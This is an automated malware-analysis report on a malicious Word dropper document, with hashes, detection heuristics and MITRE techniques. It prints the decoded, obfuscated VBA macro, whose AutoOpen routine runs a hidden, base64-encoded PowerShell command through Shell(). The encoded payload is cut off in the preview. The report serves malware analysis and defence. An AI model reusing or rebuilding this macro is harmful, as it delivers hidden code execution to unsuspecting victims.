Office (OLE) malware analysis — malicious · 563dd537196cfeee

MALICIOUS

Office (OLE)

100.2 KB Created: 2018-05-30 22:15:00 Authoring application: Microsoft Office Word First seen: 2018-06-19

MD5: 2a5587bc1105ee48557c854f49c4f24e SHA-1: b08bbefafe6ed22536317102442ebf8165acb10a SHA-256: 563dd537196cfeee5560e51f7ee9b0fc067062cb5a3dfb2dc0a967f77b31bd99

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The file contains a VBA macro with an AutoOpen function that utilizes the Shell() function to execute a command. This command is obfuscated but appears to be designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6566155-0' further supports its role as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6566155-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6566155-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14557 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14557 bytes
SHA-256: `f21a0da8649ec65c95cb62463d7a7f50325131c62b589e9cf94e558830e2a35e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "CbAHRLOAqXtR" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function MHGiEXaui() On Error Resume Next wIRji = Atn(37740 * CInt(73158) + 96065 - 93435) Qftjiw = 39277 + _ Log(78244) - IqrvOr / Atn(51421) / mVYTaE / vNqRsU BjMmp = Atn(81232 * CInt(33328) + 1737 - 41621) WWqXH = 25533 + _ Log(5970) - DlzcYS / Atn(80080) / wkQHDv / CoHjc MHGiEXaui = aivpfpVN + sAYZOBAJ + rXKjVGFm + VQfGrsd + MtZlf + qWsutsHL kRlzV = Atn(94033 * CInt(7383) + 27457 - 46860) AncojG = 48500 + _ Log(21511) - wOrjkO / Atn(99062) / Poizda / TTNdCV End Function Sub Autoopen() On Error Resume Next MawQTa = Atn(13457 * CInt(46355) + 90618 - 29132) pfnskB = 72044 + _ Log(42649) - oapoW / Atn(25386) / VPtwIY / BRjTu naLwZj (MHGiEXaui) TrsTD = Atn(77205 * CInt(90385) + 99728 - 51112) Mrjzzm = 69815 + _ Log(15496) - GmlIBT / Atn(76874) / UmaAh / zCwhWl End Sub Function naLwZj(WJVNAKI) On Error Resume Next SovjhE = Atn(54029 * CInt(48357) + 25427 - 28077) bZomii = 83104 + _ Log(917) - WaNzh / Atn(58625) / iwBFO / Lozpc ptqKJE = uTdakzPkNi + Chr(vbKeyP) + Fhhzfs OLsHX = Atn(86952 * CInt(48313) + 15086 - 5463) UNqVV = 22219 + _ Log(84558) - vwCDtd / Atn(23090) / TFNzp / GWlDiS SclwonVzA = caMzQ + Shell(GrfHwihM + ptqKJE + PjTOf + WJVNAKI + OwfqcCwipF, vbHide) GIWzXb = Atn(76030 * CInt(29687) + 85381 - 1694) wVuiR = 20859 + _ Log(35967) - vOZUt / Atn(5688) / cHTjS / ZlopjF End Function Attribute VB_Name = "BYtbENDTzc" Function aivpfpVN() On Error Resume Next bOsmYP = Atn(29626 * CInt(67413) + 1774 - 88191) MkDYu = 57242 + _ Log(86155) - lkZuXt / Atn(60411) / YsihE / zPWJh uicQzzXTR = "owersHeLL " + "-WinDowsTyle hi" + "dden -e" + " IAAmACAAKAAgAC" + "QAUwBIAEUA" + "TABsAGkA" + "RABbADE" + "AXQArACQAcwBIAG" + "UATABsAG" VYiMjb = Atn(53455 * CInt(34953) + 67634 - 11059) fqvOL = 2964 + _ Log(39573) - ttOqq / Atn(36086) / PzknC / wFZNCM vDzEXZ = "kAZABbADEAM" + "wBdACs" + "AJwB4ACc" + "AKQAoACgAKAAiAH" wRNRT = Atn(71873 * CInt(4784) + 82219 - 17427) oOBnou = 11730 + _ Log(64748) - uTLchv / Atn(6928) / jlVAJ / GYbfzX aqsswn = "sANwA" + "0AH0Aew" + "A3ADI" + "AfQB7ADYAMgB9AH" + "sANAAwAH" + "0AewAyADA" + "AfQB7ADgA" + "MAB9AHsAN" + "AA5AH0AewA1AD" + "kAfQB7ADEANQB9" QVGzv = Atn(49581 * CInt(1166) + 93960 - 16514) TfJSt = 70070 + _ Log(78783) - WPOTFn / Atn(97299) / ZuPMOI / ndwFc aEmIGYoiPir = "AHsAMwAwAH0Aew" + "A1ADc" + "AfQB7ADgAN" + "wB9AHsA" VCZaaB = Atn(40509 * CInt(98537) + 42434 - 24584) mzbIqw = 31076 + _ Log(36275) - QAFhv / Atn(93917) / VWovi / uAMpt hjubpQpW = "MwA1AH0Aew" + "A3ADMAfQB7AD" + "IANgB9AHsAN" + "gA5AH0A" + "ewAxAD" + "QAfQB7ADEAMQ" + "B9AHsANQ" + "AzAH0AewA0ADUAf" ldjDia = Atn(50164 * CInt(27793) + 63838 - 4140) himbVV = 94728 + _ Log(84466) - dqzchR / Atn(18767) / FavBDk / XjzXHV UrjXDLVW = "QB7ADgANQB9A" + "HsANQAwAH" + "0AewAyADgAfQB" + "7ADEAOAB9AHsAN" + "gAwAH0AewAzADYA" + "fQB7ADEANwB9" + "AHsANQAyAH0" + "AewA2ADUAfQB7AD" + "cAOAB9A" + "HsANgAzAH0AewA" iTZHNr = Atn(70594 * CInt(49109) + 60553 - 29281) OBuiDV = 32168 + _ Log(32266) - JGGwdz / Atn(10495) / lYZkI / MjDZER ZmwbPtJMViT = "1ADUAfQB7" + "ADkAfQB7ADM" + "AMQB9AHsA" + "NwA1AH0Aew" + "A4ADgAfQB" + "7ADEAOQ" fvjDpj = Atn(73986 * CInt(87757) + 60972 - 52103) qWZXM = 55594 + _ Log(58221) - mjnHp / Atn(23986) / GiwAw / wKdLa BLLjFE = "B9AHsAMQA" + "2AH0AewAxADAA" + "fQB7ADgANAB9A" + "HsAMAB9AHsANwA2" + "AH0AewAyADMAf" + "QB7AD" oOSKFw = Atn(35918 * CInt(88680) + 73899 - 41925) TavofI = 84252 + _ Log(76620) - rjcEvf / Atn(59171) / rLvMmk / BTWhKW mjEGMWWKkv = "cAfQB7ADY" + "ANAB9AHsAOAA2AH" + "0AewAxADMAfQB7A" + "DMANA" + "B9AHsAMgB9AHs" TltiZ = Atn(1786 * CInt(46125) + 37633 - 2901) XjAFlO = 28043 + _ Log(50606) - YCaac / Atn(62857) / FmLmJd / ZPrKQ fOBvMj = "ANAAzAH0" + "AewA0ADgAfQB7" + "ADEAMgB9A" + "HsANQA2AH0AewA3" + "ADAAfQB7ADg" + "AMwB9AHsANgA" + "4AH0Ae" + "wA3ADkAfQB7" ... (truncated)

SHA-256: f21a0da8649ec65c95cb62463d7a7f50325131c62b589e9cf94e558830e2a35e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "CbAHRLOAqXtR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function MHGiEXaui()
On Error Resume Next
wIRji = Atn(37740 * CInt(73158) + 96065 - 93435)
Qftjiw = 39277 + _
Log(78244) - IqrvOr / Atn(51421) / mVYTaE / vNqRsU
BjMmp = Atn(81232 * CInt(33328) + 1737 - 41621)
WWqXH = 25533 + _
Log(5970) - DlzcYS / Atn(80080) / wkQHDv / CoHjc
MHGiEXaui = aivpfpVN + sAYZOBAJ + rXKjVGFm + VQfGrsd + MtZlf + qWsutsHL
kRlzV = Atn(94033 * CInt(7383) + 27457 - 46860)
AncojG = 48500 + _
Log(21511) - wOrjkO / Atn(99062) / Poizda / TTNdCV
End Function
Sub Autoopen()
On Error Resume Next
MawQTa = Atn(13457 * CInt(46355) + 90618 - 29132)
pfnskB = 72044 + _
Log(42649) - oapoW / Atn(25386) / VPtwIY / BRjTu
naLwZj (MHGiEXaui)
TrsTD = Atn(77205 * CInt(90385) + 99728 - 51112)
Mrjzzm = 69815 + _
Log(15496) - GmlIBT / Atn(76874) / UmaAh / zCwhWl
End Sub
Function naLwZj(WJVNAKI)
On Error Resume Next
SovjhE = Atn(54029 * CInt(48357) + 25427 - 28077)
bZomii = 83104 + _
Log(917) - WaNzh / Atn(58625) / iwBFO / Lozpc
ptqKJE = uTdakzPkNi + Chr(vbKeyP) + Fhhzfs
OLsHX = Atn(86952 * CInt(48313) + 15086 - 5463)
UNqVV = 22219 + _
Log(84558) - vwCDtd / Atn(23090) / TFNzp / GWlDiS
SclwonVzA = caMzQ + Shell(GrfHwihM + ptqKJE + PjTOf + WJVNAKI + OwfqcCwipF, vbHide)
GIWzXb = Atn(76030 * CInt(29687) + 85381 - 1694)
wVuiR = 20859 + _
Log(35967) - vOZUt / Atn(5688) / cHTjS / ZlopjF
End Function



Attribute VB_Name = "BYtbENDTzc"
Function aivpfpVN()
On Error Resume Next
bOsmYP = Atn(29626 * CInt(67413) + 1774 - 88191)
MkDYu = 57242 + _
Log(86155) - lkZuXt / Atn(60411) / YsihE / zPWJh
uicQzzXTR = "owersHeLL " + "-WinDowsTyle hi" + "dden -e" + " IAAmACAAKAAgAC" + "QAUwBIAEUA" + "TABsAGkA" + "RABbADE" + "AXQArACQAcwBIAG" + "UATABsAG"
VYiMjb = Atn(53455 * CInt(34953) + 67634 - 11059)
fqvOL = 2964 + _
Log(39573) - ttOqq / Atn(36086) / PzknC / wFZNCM
vDzEXZ = "kAZABbADEAM" + "wBdACs" + "AJwB4ACc" + "AKQAoACgAKAAiAH"
wRNRT = Atn(71873 * CInt(4784) + 82219 - 17427)
oOBnou = 11730 + _
Log(64748) - uTLchv / Atn(6928) / jlVAJ / GYbfzX
aqsswn = "sANwA" + "0AH0Aew" + "A3ADI" + "AfQB7ADYAMgB9AH" + "sANAAwAH" + "0AewAyADA" + "AfQB7ADgA" + "MAB9AHsAN" + "AA5AH0AewA1AD" + "kAfQB7ADEANQB9"
QVGzv = Atn(49581 * CInt(1166) + 93960 - 16514)
TfJSt = 70070 + _
Log(78783) - WPOTFn / Atn(97299) / ZuPMOI / ndwFc
aEmIGYoiPir = "AHsAMwAwAH0Aew" + "A1ADc" + "AfQB7ADgAN" + "wB9AHsA"
VCZaaB = Atn(40509 * CInt(98537) + 42434 - 24584)
mzbIqw = 31076 + _
Log(36275) - QAFhv / Atn(93917) / VWovi / uAMpt
hjubpQpW = "MwA1AH0Aew" + "A3ADMAfQB7AD" + "IANgB9AHsAN" + "gA5AH0A" + "ewAxAD" + "QAfQB7ADEAMQ" + "B9AHsANQ" + "AzAH0AewA0ADUAf"
ldjDia = Atn(50164 * CInt(27793) + 63838 - 4140)
himbVV = 94728 + _
Log(84466) - dqzchR / Atn(18767) / FavBDk / XjzXHV
UrjXDLVW = "QB7ADgANQB9A" + "HsANQAwAH" + "0AewAyADgAfQB" + "7ADEAOAB9AHsAN" + "gAwAH0AewAzADYA" + "fQB7ADEANwB9" + "AHsANQAyAH0" + "AewA2ADUAfQB7AD" + "cAOAB9A" + "HsANgAzAH0AewA"
iTZHNr = Atn(70594 * CInt(49109) + 60553 - 29281)
OBuiDV = 32168 + _
Log(32266) - JGGwdz / Atn(10495) / lYZkI / MjDZER
ZmwbPtJMViT = "1ADUAfQB7" + "ADkAfQB7ADM" + "AMQB9AHsA" + "NwA1AH0Aew" + "A4ADgAfQB" + "7ADEAOQ"
fvjDpj = Atn(73986 * CInt(87757) + 60972 - 52103)
qWZXM = 55594 + _
Log(58221) - mjnHp / Atn(23986) / GiwAw / wKdLa
BLLjFE = "B9AHsAMQA" + "2AH0AewAxADAA" + "fQB7ADgANAB9A" + "HsAMAB9AHsANwA2" + "AH0AewAyADMAf" + "QB7AD"
oOSKFw = Atn(35918 * CInt(88680) + 73899 - 41925)
TavofI = 84252 + _
Log(76620) - rjcEvf / Atn(59171) / rLvMmk / BTWhKW
mjEGMWWKkv = "cAfQB7ADY" + "ANAB9AHsAOAA2AH" + "0AewAxADMAfQB7A" + "DMANA" + "B9AHsAMgB9AHs"
TltiZ = Atn(1786 * CInt(46125) + 37633 - 2901)
XjAFlO = 28043 + _
Log(50606) - YCaac / Atn(62857) / FmLmJd / ZPrKQ
fOBvMj = "ANAAzAH0" + "AewA0ADgAfQB7" + "ADEAMgB9A" + "HsANQA2AH0AewA3" + "ADAAfQB7ADg" + "AMwB9AHsANgA" + "4AH0Ae" + "wA3ADkAfQB7"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.